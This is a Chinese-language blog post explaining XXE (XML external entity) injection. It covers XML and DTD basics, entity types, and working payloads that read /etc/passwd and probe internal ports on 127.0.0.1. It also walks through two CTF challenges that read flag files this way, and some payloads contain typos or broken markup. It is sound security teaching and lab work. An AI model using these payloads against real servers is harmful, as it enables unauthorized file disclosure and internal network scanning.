

<!DOCTYPE html>
<html lang="zh" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="FHK_KMD6377">
  <meta name="keywords" content="">
  
    <meta name="description" content="漏洞-XEEhttps:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;3357?time__1311&#x3D;n4%2BxnD0DgGYQwqYq40HpDUOODBnbCKe4D XXE注入 XXE注入全称是xml external entity注入，也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取，命令执行等攻击。  一、XML简">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞-XEE 639">
<meta property="og:url" content="http://example.com/2024/09/03/%E6%BC%8F%E6%B4%9E-XEE/index.html">
<meta property="og:site_name" content="FHK_KMD终晨">
<meta property="og:description" content="漏洞-XEEhttps:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;3357?time__1311&#x3D;n4%2BxnD0DgGYQwqYq40HpDUOODBnbCKe4D XXE注入 XXE注入全称是xml external entity注入，也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取，命令执行等攻击。  一、XML简">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/images/967964-20200218170611565-506025019.png">
<meta property="og:image" content="http://example.com/images/20200827215359547.jpg">
<meta property="og:image" content="http://example.com/images/20200827220200446%202.jpg">
<meta property="og:image" content="http://example.com/images/20200827220356935.jpg">
<meta property="og:image" content="http://example.com/images/20200827220726654.jpg">
<meta property="og:image" content="http://example.com/images/2020082722084479.jpg">
<meta property="og:image" content="http://example.com/images/20200827220942135.jpg">
<meta property="article:published_time" content="2024-09-02T16:00:00.000Z">
<meta property="article:modified_time" content="2024-09-25T04:31:17.139Z">
<meta property="article:author" content="FHK_KMD6377">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/967964-20200218170611565-506025019.png">
  
  
  
  <title>漏洞-XEE 639 - FHK_KMD终晨</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>FHK_KMD&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Inicio</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archivo</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categorías</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Etiquetas</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>Acerca</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="漏洞-XEE 639"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-03 00:00" pubdate>
          September 3, 2024 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          770 palabras
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 minutos
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">漏洞-XEE 639</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="漏洞-XEE"><a href="#漏洞-XEE" class="headerlink" title="漏洞-XEE"></a>漏洞-XEE</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3357?time__1311=n4+xnD0DgGYQwqYq40HpDUOODBnbCKe4D">https://xz.aliyun.com/t/3357?time__1311=n4%2BxnD0DgGYQwqYq40HpDUOODBnbCKe4D</a></p>
<h2 id="XXE注入"><a href="#XXE注入" class="headerlink" title="XXE注入"></a>XXE注入</h2><blockquote>
<p>XXE注入全称是xml external entity<br>注入，也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取，命令执行等攻击。</p>
</blockquote>
<h3 id="一、XML简介"><a href="#一、XML简介" class="headerlink" title="一、XML简介"></a>一、XML简介</h3><p>XML是一种用户自定义的标记语言，主要用于数据的存储和传输。<br>XML文档结构包括3部分:XML声明、文档类型定义(可选)和文档元素<br><img src="/images/967964-20200218170611565-506025019.png" srcset="/img/loading.gif" lazyload></p>
<p>XML文档有自己的一个格式规范。是由DTD（document typedefine)来控制的。例如：</p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot;?&gt; &lt;!--XML文档定义--&gt;
&lt;!DOCTYPE message [ &lt;!--定义该文档为message类型--&gt;
&lt;!ELEMENT message(username,password)&lt;!-- 定义message有两个元素--&gt;
&lt;!ELEMENT username(#PCDATA)&gt; &lt;!-- 定义username元素为#PCDATA类型 --&gt;
&lt;!ELEMENT password(#PCDATA)&gt;
]&gt;
</code></pre>
<p>上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素，后面的XML就要像如下的方式来书写。</p>
<pre><code class="hljs">&lt;message&gt;
    &lt;username&gt;root&lt;/username&gt;
    &lt;password&gt;123&lt;/password&gt;
&lt;/message&gt;
</code></pre>
<h3 id="二、XML实体"><a href="#二、XML实体" class="headerlink" title="二、XML实体"></a>二、XML实体</h3><p>上面的&lt;!ELEMENT&gt;中定义的是 <strong>元素</strong> ，也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个 <strong>变量</strong><br>，到时候可以在XML中通过&amp;符号来引用。</p>
<p>XML可分为 <strong>外部实体</strong> 和 <strong>内部实体</strong> 。首先来看内部实体：  </p>
<h4 id="内部实体"><a href="#内部实体" class="headerlink" title="内部实体"></a>内部实体</h4><p><strong>示例 ：</strong></p>
<pre><code class="hljs">&lt;? xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
&lt;!ELEMENT message ANY&gt;
&lt;!ENTITY tst &quot;test&quot;&gt;
]&gt;
</code></pre>
<p>其中元素定义的ANY说明接受任何元素，同时定义了一个xml实体（&lt;! ENTITY&gt;标签），这样就可以在XML文档中这样来写</p>
<pre><code class="hljs">&lt;message&gt;
&lt;user&gt;&amp;tst;&lt;/user&gt;
&lt;/message&gt;
</code></pre>
<h4 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h4><p><strong>示例 ：</strong></p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;]&gt;
&lt;message&gt;
    &lt;user&gt;&amp;xxe;&lt;/user&gt;
&lt;/message&gt;
</code></pre>
<p>这里用 <strong>&amp; 实体名;</strong> 引用实体，在DTD中定义，在XML文档中引用。<br>通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开，还可以分为 <strong>通用实体</strong> 和 <strong>参数实体</strong> 。</p>
<h4 id="通用实体"><a href="#通用实体" class="headerlink" title="通用实体"></a><strong>通用实体</strong></h4><p>用 &amp;实体名; 引用的实体，他在DTD 中定义，在 XML 文档中引用<br><strong>示例 ：</strong></p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;!DOCTYPE Profile [&lt;!ENTITY file SYSTEM &quot;file:///etc/passwd&quot;&gt;]
&lt;Profile&gt;
 &lt;msg&gt;&amp;file;&lt;/msg&gt;
&lt;/Profile&gt;
</code></pre>
<h4 id="参数实体"><a href="#参数实体" class="headerlink" title="参数实体"></a><strong>参数实体</strong></h4><p>(1)使用 <code>% 实体名</code>( <strong>这里面空格不能少</strong> ) 在 DTD 中定义，并且 <strong>只能在 DTD 中使用<code>%实体名;</code> 引用</strong><br>(2)只有在 DTD 文件中，参数实体的声明才能引用其他实体<br>(3)和通用实体一样，参数实体也可以外部引用<br><strong>示例 ：</strong></p>
<pre><code class="hljs">&lt;!ENTITY % an-element &quot;&lt;!ELEMENT mytag (subtag)&gt;&quot;&gt; 
&lt;!ENTITY % remote-dtd SYSTEM &quot;http://somewhere.example.org/remote.dtd&quot;&gt; 
%an-element; %remote-dtd;
</code></pre>
<h3 id="三、利用方式"><a href="#三、利用方式" class="headerlink" title="三、利用方式"></a>三、利用方式</h3><h4 id="读取本地文件"><a href="#读取本地文件" class="headerlink" title="读取本地文件"></a>读取本地文件</h4><p>构造payload<br>    <code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;     </code><!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]<br>    <code>   &lt;Profile&gt;    </code>    <msg>&amp;file;</msg><br>    &#96;   </Profile></p>
<p>抓包,在payload通过传参给到服务器解析XML文件的API<br>如此便读取到了敏感信息</p>
<h4 id="扫描内网存活端口"><a href="#扫描内网存活端口" class="headerlink" title="扫描内网存活端口"></a>扫描内网存活端口</h4><p>外部实体也可以支持http file php等协议<br>可以将file实体改成http:127.0.0.1:不同的端口<br><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;     </code><!DOCTYPE Profile [<!ENTITY file SYSTEM "http:127.0.0.1:[在这里加上burp的爆破模块]">]<br>    <code>   &lt;Profile&gt;    </code>    <msg>&amp;file;</msg><br>    &#96;   </Profile></p>
<h3 id="四、CTF中XEE攻击"><a href="#四、CTF中XEE攻击" class="headerlink" title="四、CTF中XEE攻击"></a>四、CTF中XEE攻击</h3><p>1.题目地址：Jarvis <a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32794/">http://web.jarvisoj.com:32794/</a><br>打开链接，输入数据后抓包：<br><img src="/images/20200827215359547.jpg" srcset="/img/loading.gif" lazyload><br>发现传的是JSON数据，考虑修改一下上传文件类型为XML类型。构造外部实体，实现XXE攻击。将ContentType字段改为:application&#x2F;xml,然后在请求内容中加上如下的payload:</p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE message [
&lt;!ENTITY shell SYSTEM &quot;file///etc/passwd&quot;&gt;
]&gt;
&lt;message&gt;&amp;shell;&lt;/message&gt;
</code></pre>
<p><img src="/images/20200827220200446%202.jpg" srcset="/img/loading.gif" lazyload><br>发现了&#x2F;home&#x2F;ctf路径。改一下file的路径：file:&#x2F;&#x2F;&#x2F;home&#x2F;ctf&#x2F;flag.txt。即可得到flag<br><img src="/images/20200827220356935.jpg" srcset="/img/loading.gif" lazyload></p>
<p>2.题目地址：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges">https://buuoj.cn/challenges</a> (Fake XML cookbook)<br><img src="/images/20200827220726654.jpg" srcset="/img/loading.gif" lazyload><br>抓包后，发现上传的是XML类型的数据<br><img src="/images/2020082722084479.jpg" srcset="/img/loading.gif" lazyload><br>直接构造XML外部实体，读flag。payload如下：</p>
<pre><code class="hljs">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE user[
&lt;!ENTITY admin SYSTEM &quot;file:///flag&quot;&gt;
]&gt;
&lt;user&gt;&lt;username&gt;&amp;admin;&lt;/username&gt;&lt;password&gt;passwd&lt;/password&gt;&lt;/user&gt;
</code></pre>
<p><img src="/images/20200827220942135.jpg" srcset="/img/loading.gif" lazyload></p>
<p><strong>参考文章</strong><br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3357">https://xz.aliyun.com/t/3357</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/175451.html">https://www.freebuf.com/vuls/175451.html</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>漏洞-XEE 639</div>
      <div>http://example.com/2024/09/03/漏洞-XEE/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Autor</div>
          <div>FHK_KMD6377</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Publicado el</div>
          <div>September 3, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licencia bajo</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Atribución">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/09/03/%E6%BC%8F%E6%B4%9E-SSTI/" title="漏洞-SSTI 639">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">漏洞-SSTI 639</span>
                        <span class="visible-mobile">Anterior</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/09/03/%E6%BC%8F%E6%B4%9E-php%E5%BA%8F%E5%88%97%E5%8C%96/" title="漏洞-php序列化 639">
                        <span class="hidden-mobile">漏洞-php序列化 639</span>
                        <span class="visible-mobile">Siguiente</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Tabla de Contenidos</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Buscar</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Palabra clave</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">El blog funciona mejor con JavaScript habilitado</div>
  </noscript>
</body>
</html>
